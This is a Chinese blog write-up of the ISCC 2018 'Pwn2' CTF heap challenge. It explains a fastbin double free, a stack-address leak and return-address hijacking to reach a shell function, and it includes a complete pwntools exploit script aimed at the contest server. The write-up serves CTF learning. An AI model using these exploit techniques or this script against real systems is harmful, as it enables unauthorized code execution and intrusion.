180509 Pwn-ISCC(Pwn2)

最新推荐文章于 2023-06-08 14:45:22 发布
最新推荐文章于 2023-06-08 14:45:22 发布
阅读量869 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whklhhhh/article/details/80256125
版权

写作Pwn3读作Pwn2 23333
打开pwn3反编译,发现菜单,很明显是堆的题目了
看了一下在free的时候没有清空指针,造成野指针
以我浅薄的知识猜想是double free吧

参考ctf-wiki的fastbin-attack
主要漏洞在于通过fastbin管理堆的情况下,在free时仅会检查链表头部(即main_arena指向)的chunk

第一次释放free(chunk1)
这里写图片描述
第二次释放free(chunk2)
这里写图片描述
第三次释放free(chunk1)
这里写图片描述

这里第三次free(chunk1)后尾部的chunk1的next也指向了chunk2,甚至当重新malloc的时候分配了chunk1的内存,导致chunk1的next事实上可写。
当第四次malloc(即本该由于fastbin管理的链表为空,导致重新向系统申请内存的时候),可以申请到指定的地址,从而创造出任意地址写任意值的情况

另一边,在main函数中由于是死循环,所以没有什么可以操作的余地
但在3的选项中存在一个secret函数,其中与main看起来一致,实际上却可以return导致执行流的劫持

函数列表中存在一个没有调用的gg函数可以getshell,因此思路就是通过double free来写栈上的返回地址,将执行流劫持到gg上来getshell

这样还有一个问题就是栈的地址,虽然get_num函数中对input的长度做了限制,但是输出的时候却没有。当input的值恰好为48填满栈时,输出将会把栈底保存的ebp也打印出来,直到遇到ebp的\x00截断位置,从而得到栈的地址,经过计算即可准确找到返回地址的地址

原题https://github.com/mhzx020/Redirect#redirect的exp:

from pwn import *

shell_addr = 0x400943

context.timeout = 50

#p = process('./pwn3')
p = remote('47.104.16.75',8999)
#gdb.attach(p, 'b * 0x400923')

# leak stack address
p.recvuntil('paper\n')
p.sendline('a'*48*3)
data = p.recvuntil('\x7f')
leak_stack = data[-6:] + '\x00\x00'
leak_stack_addr = u64(leak_stack)
print hex(leak_stack_addr)

def add_paper(p, index, length, contents):
    p.sendline('1')
    p.sendline(str(index))
    p.sendline(str(length))
    p.sendline(contents)

def del_paper(p, index):
    p.sendline('2')
    p.sendline(str(index))

# fastbin double free
add_paper(p, 1, 32, 'a'*32)
add_paper(p, 2, 32, 'a'*32)

del_paper(p, 1)
del_paper(p, 2)
del_paper(p, 1)

# build fake chunk
p.recvuntil('paper\n')
p.sendline('3')
p.recvuntil('number:')
p.sendline('48')

add_paper(p, 1, 32, p64(leak_stack_addr+96))
add_paper(p, 2, 32, 'a'*32)
add_paper(p, 2, 32, 'a'*32)
add_paper(p, 2, 32, 'a'*8 + p64(shell_addr))

p.recvrepeat(1)
p.sendline('3')

p.interactive()

然而实际运行中还有两个问题:
1. 原exp中使用了'a'*48*3的输入来泄露栈的地址,但是实际上在本地只需要48个输入即可暴露出栈的地址,而服务器端前两次都不会输出栈的地址,只有第三次才会输出,很奇妙
2. 同样的exp在几个队友的机子上跑有的很正常有的会间歇性报SIGABORT的错误有的甚至根本拿不到shell……奇妙到爆炸
萌新表示pwn太玄学了OTZ

奈沙夜影
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022ISCC PWN
山高路远
07-05 1783
2022ISCC
习题-pwn2
m0_49959202的博客
09-18 138
文章目录pwn21.程序分析2.栈帧设计3.exp编写 pwn2 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现pie关闭: ida分析程序,发现存在system函数,因此可以到plt内找到system: 分析vulnerable_function(),可以得到需要溢出的长度为0x88 + 4 =136+4 = 140,同时存在read(),可以用来溢出 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3YpmnStC-1631942444
pwn2own
weixin_34367257的博客
04-04 1077
Pwn2Own是全球最著名的黑客大赛之一,由美国五角大楼入侵防护系统供应商TippingPoint的DVLabs赞助,今年已经是第六届。 1比赛规则 参赛黑客们的目标是4大主流网页浏览器——IE、Firefox、Chrome和Safari,平台是在安装安全更新的Windows 7操作系统下运行,Safari浏览器将在安装苹果Mac OS X 10.6雪豹操作系统下运作,顺利攻破一个主流浏览器便...
ISCC部分pwn题解
qq_46441427的博客
05-25 1864
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的题,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
pwn2_sctf_2016
m0sway的博客
04-06 673
pwn2_sctf_2016 WriteUp BUU_PWN
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwn-x64-printf泄露题目
08-04
x64 printf回显漏洞
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
英招杯 pwn2(ret2shellcode)
qq_53928256的博客
11-16 294
由于程序运行时,即输出了输入值s的存放首地址,我们输入的首地址与shellcode之间的距离是0x3c-0x28=0x14,故只需返回s的首地址加上0x14即可;我们分析main函数的时候可以看到栈中的s距离rbp还有一段距离,且程序的NX保护未开启,我们可以考虑写入shellcode在栈中执行。根据图中与rbp的偏移,我们相对比较容易的出var_30对应的变量为v5,var_8对应的变量为v10。在网上我们可以查到相对较短的syscall系统调用的shellcode为23字节,满足我们所需的要求。
ISCC2021-[pwn]game
半岛铁盒的博客
05-26 661
from pwn import * from ctypes import * p = remote('39.96.88.40','7040') context.log_level="debug" payload = b'a' * (0x30-0x8) + p32(0) p.sendlineafter("Your name is :",payload) rand = ['55 ','15 ','82 ','1 ','98 ','68 ','67 ','15 ','86 ','3 '] fo...
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2501
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
180503 Pwn-ISCC(1)
whklhhhh的博客
05-25 501
pwn复健的第一题(:з」∠)还好比较简单 简单分析一下,在Menu中存在栈溢出,并且没有Canary保护 不过有NX保护,因此无法直接传入Shellcode 查了一下pwn的相关知识,发现这里导入了system函数,因此可以直接使用ret2system来getshell system传参的寄存器是edi 这个常识级别的东西因为不记得,导致用栈传参试了半天不知道为啥错orz发现这个点...
pwn(2)-栈溢出下
qq_73667990的博客
06-08 1394
只要我们通过特定的汇编代码把特定的寄存器设定为特定的值后,在调用int 80h执行sys_execve(“/bin/sh”,NULL,NULL)就可以获得shell了;64位程序传递参数不是直接通过栈,而是前六个参数通过寄存器,分别是RDI,RSI,RDX,RCX,R8,R9。不同内核态操作通过给寄存器设置不同的值,在调用指令int 80h,就可以通知内核完成不同的功能。2.ebx设为"/bin/sh"字符串的地址。2.RDI设为"/bin/sh"字符串的地址,RDI=&(“/bin/sh”)
BUUCTF pwn2_sctf2016
红叶的博客
11-01 488
本题难点:绕过字符串大小限制以及是否掌握了ret2libc。
ISCC2017 pwn 200 —— 字符串格式化漏洞
giantbranch的专栏
05-31 3614
简介  这是一道字符串格式化漏洞的题目,给了libc,直接字符串格式化漏洞泄露出地址,就可以算出system的地址,最后再写got表就行了伪代码int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [sp+14h] [bp-6Ch]@3 int v4; // [sp+1
[BMZCTF-pwn] 24-pwn2
weixin_52640415的博客
02-16 179
第二题是个栈溢出的题,也属于白送的那种,程序直接调用check在check里向48字节的空间写入0x400,导致栈溢出。而且没有canary没开pie这样就能直接通过溢出 int check() { char buf[48]; // [rsp+0h] [rbp-30h] BYREF read(0, buf, 0x400uLL); return strcmp(buf, "21232F297A57A5A743894A0E4A801FC3"); } 思路就是先通过溢出调用puts(got[pu
攻防世界pwn-forgot
最新发布
08-10
- *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值